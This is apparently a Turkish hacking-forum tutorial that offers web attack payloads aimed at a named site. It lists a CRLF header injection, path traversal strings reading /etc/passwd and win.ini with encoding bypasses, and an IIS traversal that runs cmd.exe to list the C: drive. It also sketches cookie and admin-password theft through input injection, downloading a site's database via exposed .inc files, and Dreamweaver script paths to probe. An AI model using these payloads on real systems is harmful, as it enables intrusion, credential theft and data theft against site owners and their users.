XSS Nedir?
* CRLF injection
Bu Metod Biraz Daha Farklıdır Ve Alternatifi yoktur.
Sabit Bir script ile cookie alınabilir.
some_url%0d%0aSet-Cookie%3Athis_header%3Dwas_injected_by_wvs
* Directory Attack!
Basic : ../../../../../../../../etc/passwd
null : ../../../../../../../../etc/passwd%00
Byte : %00../../../../../../../../etc/passwd
* Script source code disclosure
Bu Açığı Biraz İnceleyilim ;]
http://www.e-ogrenci.org/example.%61%73%70 (%61%73%70:asp demek)
Şimdi Sistemdeki Arka Kapıyı Biraz Yoklayılım ;)
http://www.e-ogrenci.org/msadc/Samples/SELECTOR/showcode.asp?source=/msadc/Samples /../../../../../inetpub/wwwroot/default.asp
http://www.e-ogrenci.org/online/getnews.asp?item=../../../../ WINNT/win.ini
eğer server ../ ları okumazsa
%2e%2e/ ile bu method aşılabilir.
Örnek :
http://www.e-ogrenci.org/online/getnews.asp?item=%2e%2e/%2e%2e/%2e%2e/%2e%2e/WINNT/win.ini
gibi...
http://www.e-ogrenci.org/scripts/..%5c../winnt/system32/ cmd.exe?/c+dir+c:\
En Bastinden
Kafamızda Şöyle Bir Sistem kuralım
Bir Üye Girişi Olsun
Birde Şifre Yazıcağımız Alan
Kullanıcı Adı :
Şifreniz :
Her ne kadar masum gibi gözüksede
input değerlerine value="check" ufak bir injectionla Cookie ya da Admin pass almak mümkün!
Farzedelim değerin atanışı
value=request.cookies("cookiename")
sadece şifre yerine "=" yazılacak komut ile cookie sistemden çekilebilir.
(0x80004005)
Unespecified error
/file.inc, line 2
şunuda unutmayın explorer , asp , php gibi dosyaları yorumlayabilir ama inc dosyalarını yorumlamaz!
kısaca şöyle bir varyasyon oluşabilir
http://www.e-ogrenci.org/file.inc
birazda şanısınız varsa burdan db yolunu görüp sitenin databasesini (mdb,sql artık neyse) siteden çekip admin passıyla giriş yapabilirsiniz.
olayın İnceliklerine Girelim
Siteleri Kodlarken Front Page ya da Macromedia Dreamweaver Gibi Programlar Kullanırız.
* Açık List
/_mmServerScripts/MMHTTPDB.php
/_mmServerScripts/MMHTTPDB.asp
/_mmDBScripts/MMHTTPDB.php
/_mmDBScripts/MMHTTPDB.asp
Tarih:
Hit: 18333
Yazar: Rawkmetal